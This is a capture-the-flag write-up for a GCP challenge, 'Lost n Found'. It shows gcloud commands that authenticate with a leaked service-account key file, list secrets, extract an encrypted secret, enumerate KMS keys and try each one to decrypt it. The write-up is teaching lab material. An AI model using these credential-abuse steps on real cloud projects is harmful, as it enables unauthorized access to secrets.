Tags: gcp cloud
Rating:
# writeup
Write up for the `Lost n Found` challenge
## Enumeration #1
Check what we can do with attached file `legacy.json`. Inside this file we can see there are a credentials for service account in the GCP:
* service account: `legacy-svc-account@ductf-lost-n-found.iam.gserviceaccount.com`
* project id: `ductf-lost-n-found`
By using below command we can login to the GCP project `ductf-lost-n-found`
```bash
gcloud auth activate-service-account --key-file=legacy.json
gcloud config set project ductf-lost-n-found
```
## Enumeration #2
Next step is checking all possible resources which we are able to use by above service account. We used for this enumeration `gcloud` CLI and try to list resources for all possible parameters. Most of API's in the GCP was disabled but...
After enumeration we can see only `secrets` and `kms` APIs are enabled in the `ductf-lost-n-found` project and service account `legacy-svc-account@ductf-lost-n-found.iam.gserviceaccount.com` has an access to this resources.
## Enumaration #3
Based on `Enumeration #2` research we can extract secret to the `secret_enc` file and save all available keys.
```bash
gcloud secrets list
gcloud secrets versions access latest --secret="unused_data" |base64 -d >secret_enc
gcloud kms keyrings list --location australia-southeast2 # we know CTF is played in Australia
gcloud kms keys list --keyring projects/ductf-lost-n-found/locations/australia-southeast2/keyRings/wardens-locks |tail -n +2 |awk '{ print $1 }' |sed 's/^.*cryptoKeys\///g' >keys
```
## Check the final flag
Now we have `keys` file with the list of all available keys and `secret_enc` file with the secret in the encrypted form, so we can try to use one of the key to decrypt the secret.
```bash
while read line; do gcloud kms decrypt --key $line --ciphertext-file=secret_enc --plaintext-file=secret_dec --location australia-southeast2 --keyring=wardens-locks; done